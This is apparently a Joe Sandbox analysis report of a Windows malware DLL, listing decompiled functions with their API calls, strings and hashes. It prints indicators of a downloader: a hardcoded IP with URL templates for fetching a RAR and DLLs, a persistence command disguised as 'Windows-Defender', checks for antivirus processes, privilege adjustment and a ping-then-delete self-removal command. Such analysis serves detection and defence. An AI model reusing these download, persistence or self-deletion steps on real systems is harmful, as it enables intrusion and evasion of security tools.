String ID: : Not Exist$ : Not Exist$ : Not Exist$C:\ProgramData\Microsoft\eHome$C:\ProgramData\Microsoft\eHome$C:\ProgramData\Microsoft\eHome$C:\ProgramData\Microsoft\eHome$C:\ProgramData\Microsoft\eHome$C:\ProgramData\Microsoft\eHome$C:\ProgramData\Microsoft\eHome\BOOTSECT.exe$C:\ProgramData\Microsoft\eHome\BOOTSECT.exe$C:\ProgramData\Microsoft\eHome\BOOTSECT.exe$C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit$C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit$C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /l & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /r & C:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /l & exit$Create Successed!$Create Successed!$Create Successed!$mpcopyaccelerator.exe$msmpeng.exe$securityhealthsystray.exe
API String ID: 3181368586-1463919235
Opcode ID: 5fc17b8466742f35ed342c08070e0f80385a8825f124f7764b74a7a6124b8ecb
Instruction ID: 943748582dcdb6f84f3a38d23b2adc8210007687be65a363814196c43052d0fb
Opcode Fuzzy Hash: 5fc17b8466742f35ed342c08070e0f80385a8825f124f7764b74a7a6124b8ecb
Instruction Fuzzy Hash: D651DFB5D982557AFE00E7A09C4BFDE3224EB11381F100435FA09B6189EFA17919C7B7

Function 10009F97 Relevance: 52.6, APIs: 7, Strings: 23, Instructions: 137filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

CopyFileA.KERNEL32(C:\ProgramData\xxx.rar,C:\ProgramData\xxxx\xxx.rar,00000000), ref: 1000A008
CopyFileA.KERNEL32(C:\ProgramData\xxxx\xxx.rar,C:\ProgramData\xxx.rar,00000000), ref: 1000A030
CopyFileA.KERNEL32(C:\xx.exe,C:\ProgramData\xxxx\xxx.exe,00000000), ref: 1000A058
CopyFileA.KERNEL32(C:\ProgramData\xxxx\xxx.exe,C:\xx.exe,00000000), ref: 1000A080
Sleep.KERNEL32(000001F4), ref: 1000A0A4

Part of subcall function 10008E2E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Part of subcall function 10008E2E: Process32First.KERNEL32(?,00000128), ref: 10008E62

Sleep.KERNEL32(000001F4), ref: 1000A170
Sleep.KERNEL32(00004E20), ref: 1000A198

Strings

C:\xx.exe, xrefs: 1000A076
http://%s/upx.rar, xrefs: 10009FA5
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000A04E
360Tray.exe, xrefs: 1000A133
C:\xx.exe, xrefs: 1000A053
C:\del, xrefs: 10009FCF
47.76.31.57, xrefs: 10009FA0, 1000A0F2
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000A038
360tray.exe, xrefs: 1000A146
C:\ProgramData\xxxx\xxx.rar, xrefs: 10009FE8
C:\ProgramData\xxx.rar, xrefs: 1000A010
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000A02B
C:\ProgramData\xxxx\xxx.ini, xrefs: 1000A15E
x -o+ -pxxxxxxxxxx C:\ProgramData\xxxx\xxx.rar xxxxxxxx.dat C:\Microsoft\, xrefs: 1000A159
C:\ProgramData\xxxx\xxx.rar, xrefs: 10009FFE
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A10B
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000A07B
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A088
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000A178
C:\xx.exe, xrefs: 1000A060
http://%s/%d.dll, xrefs: 1000A0F7
C:\ProgramData\xxx.rar, xrefs: 1000A003
C:\ProgramData\xxx.rar, xrefs: 1000A026

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Copy$Sleep$AttributesCreateErrorFirstLastProcess32SnapshotToolhelp32
String ID: x -o+ -pxxxxxxxxxx C:\ProgramData\xxxx\xxx.rar xxxxxxxx.dat C:\Microsoft\$360Tray.exe$360tray.exe$47.76.31.57$C:\Microsoft\iXXX3XXX.dat$C:\Microsoft\iXXX3XXX.dat$C:\Microsoft\iXXX3XXX.dat$C:\ProgramData\xxx.rar$C:\ProgramData\xxx.rar$C:\ProgramData\xxx.rar$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.ini$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\del$C:\xx.exe$C:\xx.exe$C:\xx.exe$http://%s/%d.dll$http://%s/upx.rar
API String ID: 1105581179-2975425051
Opcode ID: 338024f12cd45a53aa2eeb1d1321c416d1e37412e965e0ca409236f6764c3932
Instruction ID: c875b329c12a74133dc6c936d4bbe857373be7bba75020f90c4f9d55cb9b7143
Opcode Fuzzy Hash: 338024f12cd45a53aa2eeb1d1321c416d1e37412e965e0ca409236f6764c3932
Instruction Fuzzy Hash: DD41D271C44205B7F620D7A08D06BDD3260EF11395F3043B1FA19E51C5E771AED98A5B

Function 100036BF Relevance: 49.2, APIs: 16, Strings: 12, Instructions: 182filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 10003A76: CreateFileA.KERNEL32(10002209,40000000,00000001,00000000,00000002,00000000,00000000,?,10002209), ref: 10003A93
Part of subcall function 10003A76: WriteFile.KERNEL32(000000FF,C:\\xxx.exe,0000000B,10002209,00000000), ref: 10003AB7
Part of subcall function 10003A76: CloseHandle.KERNEL32(000000FF), ref: 10003AC9

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000080,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002442

Sleep.KERNEL32(000003E8), ref: 100036FE
DeleteFileA.KERNEL32(C:\ProgramData\xxx.rar), ref: 10003709
DeleteFileA.KERNEL32(C:\ProgramData\xxxx\xxx.rar), ref: 10003714
Sleep.KERNEL32(000003E8), ref: 1000371F
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10003733
LoadLibraryA.KERNEL32(KERNEL32.dll,GetTempPathA), ref: 100037FD
GetProcAddress.KERNEL32(00000000), ref: 10003804
GetTickCount.KERNEL32 ref: 10003883
GetTickCount.KERNEL32 ref: 100038D7
lstrcatA.KERNEL32(?,?), ref: 10003902
CreateFileA.KERNEL32(C:\ProgramData\xxxx\xxx.rar,40000000,00000002,00000000,00000002,00000080,00000000), ref: 1000391F
WriteFile.KERNEL32(000000FF,?,?,00000000), ref: 10003974
CloseHandle.KERNEL32(000000FF), ref: 10003981
Sleep.KERNEL32(000001F4), ref: 1000398C
DeleteFileA.KERNEL32(c:\tzfz), ref: 100039A6

Strings

C:\ProgramData\xxx.rar, xrefs: 10003704
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000391A
Plugin32.dll, xrefs: 1000388A, 10003890
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000370F
C:\ProgramData\xxxx\xxx.rar, xrefs: 100036DD
C:\ProgramData\xxxx\xxx.rar, xrefs: 10003994
Ru%d%s, xrefs: 100038DE, 100038E4
KERNEL32.dll, xrefs: 100037F6, 100037FC
C:\ProgramData\xxx.rar, xrefs: 100036EC
c:\tzfz, xrefs: 100039A1
c:\tzfz, xrefs: 100036CE
GetTempPathA, xrefs: 100037EF, 100037F5

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: C:\ProgramData\xxx.rar$C:\ProgramData\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$GetTempPathA$KERNEL32.dll$Plugin32.dll$Ru%d%s$c:\tzfz$c:\tzfz
API String ID: 3823570417-729878102
Opcode ID: d71c76efc5ca2201bd3f13182fc7d09baedb395475a2d02b6cdc96a91a83a423
Instruction ID: a11897904966ca4e79ad0f55a5919bee9f29dce10e5a626f1588bfc26facba05
Opcode Fuzzy Hash: d71c76efc5ca2201bd3f13182fc7d09baedb395475a2d02b6cdc96a91a83a423
Instruction Fuzzy Hash: 8C9132719082E8DEEB21C774CC4DBDE7B796B16304F5441C8E18C6A182DBB65B98CF62

Function 10009BD1 Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 200filelibraryloaderCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,1000A11C,?,C:\Microsoft\iXXX3XXX.dat), ref: 10009BFD
LoadLibraryA.KERNEL32(wininet.dll), ref: 10009C42
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 10009C54
FreeLibrary.KERNEL32(00000000), ref: 10009C8C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10009CB0
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 10009CD2
FreeLibrary.KERNEL32(00000000), ref: 10009D13
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10009D36
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 10009D78
CloseHandle.KERNEL32(?), ref: 10009E0B
DeleteFileA.KERNEL32(?), ref: 10009E18
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10009E59
CloseHandle.KERNEL32(?), ref: 10009E73
Sleep.KERNEL32(00000001), ref: 10009E7B
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 10009E8A
FreeLibrary.KERNEL32(00000000), ref: 10009EBA
CopyFileA.KERNEL32(?,00000001,00000000), ref: 10009ECD

Strings

InternetCloseHandle, xrefs: 10009E81
wininet.dll, xrefs: 10009C3D
MSIE 6.0, xrefs: 10009C68
%s1, xrefs: 10009BE2
InternetOpenUrlA, xrefs: 10009CC9
InternetOpenA, xrefs: 10009C4B
404, xrefs: 10009DA4
InternetReadFile, xrefs: 10009D6F

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$AddressLibraryProc$Free$CloseDeleteHandle$ConnectCopyCreateInternetLoadSleepWrite
String ID: %s1$404$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1190458601-3861321592
Opcode ID: 318e40bc90e8ab06d56af186b2ed7bcbead1a586584a831d436c0e621b9ab314
Instruction ID: 7e47cd27a95a556a0e139f42eb6a7805dddfe8104a3d1caed863da76777d5279
Opcode Fuzzy Hash: 318e40bc90e8ab06d56af186b2ed7bcbead1a586584a831d436c0e621b9ab314
Instruction Fuzzy Hash: E8813FB5901218FBEB24DBA0CC89BDEB7B4FF48705F1045D8F609A6180D775AA89CF60

Function 100036A1 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 116filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 10003A76: CreateFileA.KERNEL32(10002209,40000000,00000001,00000000,00000002,00000000,00000000,?,10002209), ref: 10003A93
Part of subcall function 10003A76: WriteFile.KERNEL32(000000FF,C:\\xxx.exe,0000000B,10002209,00000000), ref: 10003AB7
Part of subcall function 10003A76: CloseHandle.KERNEL32(000000FF), ref: 10003AC9

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000080,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002442

Sleep.KERNEL32(000003E8), ref: 100036FE
DeleteFileA.KERNEL32(C:\ProgramData\xxx.rar), ref: 10003709
DeleteFileA.KERNEL32(C:\ProgramData\xxxx\xxx.rar), ref: 10003714
Sleep.KERNEL32(000003E8), ref: 1000371F
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10003733
LoadLibraryA.KERNEL32(KERNEL32.dll,GetTempPathA), ref: 100037FD
GetProcAddress.KERNEL32(00000000), ref: 10003804
GetTickCount.KERNEL32 ref: 10003883
GetTickCount.KERNEL32 ref: 100038D7
lstrcatA.KERNEL32(?,?), ref: 10003902
CreateFileA.KERNEL32(C:\ProgramData\xxxx\xxx.rar,40000000,00000002,00000000,00000002,00000080,00000000), ref: 1000391F

Strings

C:\ProgramData\xxx.rar, xrefs: 10003704
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000391A
Plugin32.dll, xrefs: 1000388A, 10003890
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000370F
C:\ProgramData\xxxx\xxx.rar, xrefs: 100036DD
KERNEL32.dll, xrefs: 100037F6, 100037FC
C:\ProgramData\xxx.rar, xrefs: 100036EC
c:\tzfz, xrefs: 100036CE
GetTempPathA, xrefs: 100037EF, 100037F5

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$AttributesCountCreateDeleteSleepTick$AddressCloseHandleLibraryLoadModuleNameProcWritelstrcat
String ID: C:\ProgramData\xxx.rar$C:\ProgramData\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$C:\ProgramData\xxxx\xxx.rar$GetTempPathA$KERNEL32.dll$Plugin32.dll$c:\tzfz
API String ID: 1326247360-3767109760
Opcode ID: c1055be5ab911a645e3fad6b455cf9b505a60cef63ad8b60250597d759526789
Instruction ID: 79427e8769b7bec64052f6ce7a4277d51f3709c408e5cfc96a98f1e62bb0cacd
Opcode Fuzzy Hash: c1055be5ab911a645e3fad6b455cf9b505a60cef63ad8b60250597d759526789
Instruction Fuzzy Hash: 3E510F719482E8DAEB22C7748C4D7DA7F755B16704F5841C9E28C2A182CBB61B98CF72

Function 10010D86 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 93libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 10010D95
GetProcAddress.KERNEL32(?,OpenProcessToken), ref: 10010DA7
GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 10010DB9
GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 10010DCB
LoadLibraryA.KERNEL32(kernel32.dll), ref: 10010DD9
GetProcAddress.KERNEL32(?,GetCurrentProcess), ref: 10010DEB
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 10010E4F
GetProcAddress.KERNEL32(?,GetLastError), ref: 10010E61
CloseHandle.KERNEL32(?), ref: 10010E79
FreeLibrary.KERNEL32(00000000), ref: 10010E89
FreeLibrary.KERNEL32(00000000), ref: 10010E99

Strings

AdjustTokenPrivileges, xrefs: 10010DB0
GetCurrentProcess, xrefs: 10010DE2
ADVAPI32.dll, xrefs: 10010D90
KERNEL32.dll, xrefs: 10010E4A
LookupPrivilegeValueA, xrefs: 10010DC2
OpenProcessToken, xrefs: 10010D9E
kernel32.dll, xrefs: 10010DD4
GetLastError, xrefs: 10010E58

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseHandle
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll
API String ID: 2887716753-1648388921
Opcode ID: 58b09d036d670acb644746f4fa9897a852350ece02859d2d58065642f22cff85
Instruction ID: f80cbb2656c75924d0a61663d1d925b99983c8dce08de9024ff86df164d9278a
Opcode Fuzzy Hash: 58b09d036d670acb644746f4fa9897a852350ece02859d2d58065642f22cff85
Instruction Fuzzy Hash: A431F775E11218EFEB00DFE4CC89BEDBBB5FB48301F108519FA15AA240D7789989CB61

Function 100102F2 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 270libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10010364
GetProcAddress.KERNEL32(00000000,socket), ref: 10010376
GetProcAddress.KERNEL32(00000000,recv), ref: 1001038B
GetProcAddress.KERNEL32(00000000,connect), ref: 100103A0
GetProcAddress.KERNEL32(00000000,getsockname), ref: 100103B2
GetProcAddress.KERNEL32(00000000,select), ref: 100103C7
GetLastError.KERNEL32(00000000), ref: 100103EB
GetLastError.KERNEL32(00000000), ref: 10010453

Strings

getsockname, xrefs: 100103A9
recv, xrefs: 10010382
select, xrefs: 100103BE
@, xrefs: 1001053D
socket, xrefs: 1001036D
ws2_32.dll, xrefs: 1001035F
connect, xrefs: 10010397

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$LibraryLoad
String ID: @$connect$getsockname$recv$select$socket$ws2_32.dll
API String ID: 1969025732-1530227549
Opcode ID: e6f864053651f3c54f542c848c98ba62b86a85db790c61e7e025b9f2a60c7fe8
Instruction ID: feb26c6a10e288bd31bc8a2d102fdd4da00c5d9ee6b7ba1047a1f700000d19fb
Opcode Fuzzy Hash: e6f864053651f3c54f542c848c98ba62b86a85db790c61e7e025b9f2a60c7fe8
Instruction Fuzzy Hash: 5EC1C874E0021AAFDB25CB54C9A8EDEB7B5FB48704F1045D9E909AB280D774AAC5CF50

Function 10010B93 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 134libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 10010BD1
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 10010BE3
FreeLibrary.KERNEL32(00000000), ref: 10010C15
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 10010C2B
FreeLibrary.KERNEL32(00000000), ref: 10010C60
CreateFileA.KERNEL32(00000001,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10010C80
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 10010CB8
WriteFile.KERNEL32(000000FF,?,00000000,00000000,00000000), ref: 10010D24
CloseHandle.KERNEL32(000000FF), ref: 10010D3E
Sleep.KERNEL32(00000001), ref: 10010D46
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 10010D55
FreeLibrary.KERNEL32(00000000), ref: 10010D79

Strings

InternetCloseHandle, xrefs: 10010D4C
InternetOpenUrlA, xrefs: 10010C22
wininet.dll, xrefs: 10010BCC
MSIE 6.0, xrefs: 10010BF4
InternetReadFile, xrefs: 10010CAF
InternetOpenA, xrefs: 10010BDA

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Free$File$CloseCreateHandleLoadSleepWrite
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 304647587-4269851202
Opcode ID: c81b1090cd44bbdeaa58b64d927d08e948b51acfc7d2d79b4afe9af1cf3239d3
Instruction ID: bdb9e2ab5447d4e07c4a4b6d9adb2ce9c08a7a20bd815638334c71b68ecf5c63
Opcode Fuzzy Hash: c81b1090cd44bbdeaa58b64d927d08e948b51acfc7d2d79b4afe9af1cf3239d3
Instruction Fuzzy Hash: E85105B5E01219EBDB10DF90CC89BDDBBB4FB08705F608599F6056A180C7749AC5CF59

Function 10022107 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170stringCOMMON

Download Yara Rule

APIs

Part of subcall function 100253CA: TlsGetValue.KERNEL32(?,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?,00000100,?,?), ref: 10025409

CallNextHookEx.USER32(?,00000003,?,?), ref: 10022131
GetClassLongA.USER32(?,000000E6), ref: 10022178
GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,1002506D), ref: 100221A4
lstrcmpiA.KERNEL32(?,ime), ref: 100221B3
GetWindowLongA.USER32(?,000000FC), ref: 10022226
SetWindowLongA.USER32(?,000000FC,00000000), ref: 10022247

Strings

ime, xrefs: 100221AD
AfxOldWndProc423, xrefs: 10022288, 1002228D, 10022298, 100222A0, 100222A9

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: e8e89fe10127a221fabd0c7256e3bcd23c8b042463bcb6d40cdc63fe3b308cf0
Instruction ID: f27ab1c870b9d91fb48bb56231f2f5a07b32b6dad4df22c8b5f9681b0c08fa3b
Opcode Fuzzy Hash: e8e89fe10127a221fabd0c7256e3bcd23c8b042463bcb6d40cdc63fe3b308cf0
Instruction Fuzzy Hash: DB518F35500225FFDB11DFA4DC88B9E3BA8FF043A1F614654FD19A71A1CB359A05CBA0

Function 10005262 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 90threadprocessCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000080), ref: 1000526E
GetCurrentProcess.KERNEL32(00000100), ref: 10005315
SetPriorityClass.KERNEL32(00000000), ref: 1000531C
GetCurrentThread.KERNEL32 ref: 10005324
SetThreadPriority.KERNEL32(00000000), ref: 1000532B
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 10005351
SetPriorityClass.KERNEL32(00000000,00000040), ref: 10005361
SetThreadPriority.KERNEL32(?,000000F1), ref: 1000536D
ResumeThread.KERNEL32(?), ref: 10005377
GetCurrentProcess.KERNEL32(00000020), ref: 10005386
SetPriorityClass.KERNEL32(00000000), ref: 1000538D
GetCurrentThread.KERNEL32 ref: 10005395
SetThreadPriority.KERNEL32(00000000), ref: 1000539C
ExitProcess.KERNEL32 ref: 100053A4

Strings

D, xrefs: 100052F3
> nul, xrefs: 1000529E
/c ping -n 2 127.0.0.1 > nul && del , xrefs: 10005274

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: PriorityThread$CurrentProcess$Class$AttributesCreateExitFileResume
String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$D
API String ID: 2791712772-172163237
Opcode ID: 6a379c535cee0a83972a96eefa16e2815315408d36ecad51e2145a20d6777031
